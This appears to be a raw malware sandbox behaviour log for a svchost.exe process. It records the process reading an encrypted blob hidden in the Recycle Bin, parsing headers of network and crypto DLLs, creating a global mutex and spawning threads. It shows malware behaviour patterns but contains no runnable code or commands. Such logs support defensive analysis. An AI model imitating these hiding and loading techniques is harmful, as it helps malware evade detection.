File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2046849806
System info queried Type: BasicInformation success or wait 2046856457
System info queried Type: ProcessorInformation success or wait 2046857009
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046857271
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2046883626
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046884238
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046908380
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046909071
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046910200
System info queried Type: BasicInformation success or wait 2046912219
System info queried Type: ProcessorInformation success or wait 2046912518
Thread delayed Time: 0 TID: 13344 success or wait 2048439751
Thread delayed Time: 0 TID: 13344 success or wait 2048440740
Thread delayed Time: 0 TID: 13344 success or wait 2048441950
System info queried Type: BasicInformation success or wait 2048466290
System info queried Type: ProcessorInformation success or wait 2048466509
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048466836
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048467820
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048469002
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048469252
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048470241
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048470808
System info queried Type: BasicInformation success or wait 2048472170
System info queried Type: ProcessorInformation success or wait 2048472464
System info queried Type: BasicInformation success or wait 2048498818
System info queried Type: ProcessorInformation success or wait 2048499083
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048594618
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048595366
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048597190
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048597445
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048598144
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049074467
System info queried Type: BasicInformation success or wait 2049075192
System info queried Type: ProcessorInformation success or wait 2049075728
System info queried Type: BasicInformation success or wait 2049078221
System info queried Type: ProcessorInformation success or wait 2049078782
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049079052
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049080392
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2049080927
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2049081461
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2049082064
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049107561
System info queried Type: BasicInformation success or wait 2049129085
System info queried Type: ProcessorInformation success or wait 2049129313
System info queried Type: BasicInformation success or wait 2049929204
Thread delayed Time: 0 TID: 13344 success or wait 2049930130
Thread delayed Time: 0 TID: 13344 success or wait 2049930738
System info queried Type: ProcessorInformation success or wait 2049931155
Thread delayed Time: 0 TID: 13344 success or wait 2049931432
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049931941
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049955645
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2049956765
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2049957022
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2049958031
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049958646
System info queried Type: BasicInformation success or wait 2049960094
System info queried Type: ProcessorInformation success or wait 2049960310
System info queried Type: BasicInformation success or wait 2049962810
System info queried Type: ProcessorInformation success or wait 2049963052
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049963199
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049963601
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2050000542
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2050000654
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2050000964
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2050023667
System info queried Type: BasicInformation success or wait 2050023964
System info queried Type: ProcessorInformation success or wait 2050024069
System info queried Type: BasicInformation success or wait 2050025878
System info queried Type: ProcessorInformation success or wait 2050025981
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2050026126
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2051529823
Thread delayed Time: 0 TID: 13344 success or wait 2051536198
Thread delayed Time: 0 TID: 13344 success or wait 2051537927
Thread delayed Time: 0 TID: 13344 success or wait 2051539602
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2051540645
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2051540931
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2051541726
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051584267
System info queried Type: BasicInformation success or wait 2051585025
System info queried Type: ProcessorInformation success or wait 2051585299
System info queried Type: BasicInformation success or wait 2051590085
System info queried Type: ProcessorInformation success or wait 2051590352
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051590727
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051593672
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051594271
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2051594551
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2051597397
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2051598193
System info queried Type: BasicInformation success or wait 2051598928
System info queried Type: ProcessorInformation success or wait 2051599198
System info queried Type: BasicInformation success or wait 2051646319
System info queried Type: ProcessorInformation success or wait 2051646584
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051706145
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051707162
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051707762
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2051708047
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2051711165
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2051711965
System info queried Type: BasicInformation success or wait 2051712716
System info queried Type: ProcessorInformation success or wait 2051725916
System info queried Type: BasicInformation success or wait 2051728444
System info queried Type: ProcessorInformation success or wait 2051732398
File opened Path: c:\windows\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051733093
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051738206
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051756659
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2051756953
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2051757747
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051759684
System info queried Type: BasicInformation success or wait 2052089438
System info queried Type: ProcessorInformation success or wait 2052090571
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2052100041
Thread created PID: 1052 TID: 2204 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2052101524
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2052122709
Thread delayed Time: 0 TID: 13344 success or wait 2052646890
Thread delayed Time: 0 TID: 13344 success or wait 2052647364
Thread delayed Time: 0 TID: 13344 success or wait 2052649220
Thread delayed Time: 0 TID: 13344 success or wait 2053766490
Thread delayed Time: 0 TID: 13344 success or wait 2053767751
Thread delayed Time: 0 TID: 13344 success or wait 2053769277
Thread delayed Time: 0 TID: 13344 success or wait 2054883602
Thread delayed Time: 0 TID: 13344 success or wait 2054883784
Thread delayed Time: 0 TID: 13344 success or wait 2054884498
Thread delayed Time: 0 TID: 13344 success or wait 2056006428
Thread delayed Time: 0 TID: 13344 success or wait 2056006953
Thread delayed Time: 0 TID: 13344 success or wait 2056009131
Thread delayed Time: 0 TID: 13344 success or wait 2057121759
Thread delayed Time: 0 TID: 13344 success or wait 2057122320
Thread delayed Time: 0 TID: 13344 success or wait 2057124348
Thread delayed Time: 0 TID: 13344 success or wait 2058240119
Thread delayed Time: 0 TID: 13344 success or wait 2058240633
Thread delayed Time: 0 TID: 13344 success or wait 2058242718
Thread delayed Time: 0 TID: 13344 success or wait 2059358663
Thread delayed Time: 0 TID: 13344 success or wait 2059359172
Thread delayed Time: 0 TID: 13344 success or wait 2059361239
Thread delayed Time: 0 TID: 13344 success or wait 2060477632
Thread delayed Time: 0 TID: 13344 success or wait 2060478139
Thread delayed Time: 0 TID: 13344 success or wait 2060480201
Thread delayed Time: 0 TID: 13344 success or wait 2061597014
Thread created PID: 1052 TID: 772 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2143311982
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2143322708
Thread created PID: 1052 TID: 2812 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2251495146
Thread created PID: 1052 TID: 2800 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2251495954
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2251500727
Thread created PID: 1052 TID: 4048 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2359817587
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2359829102
Analysis File: svchost.exe PID: 1100 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:09
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k NetworkService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
c:\windows\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 3 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
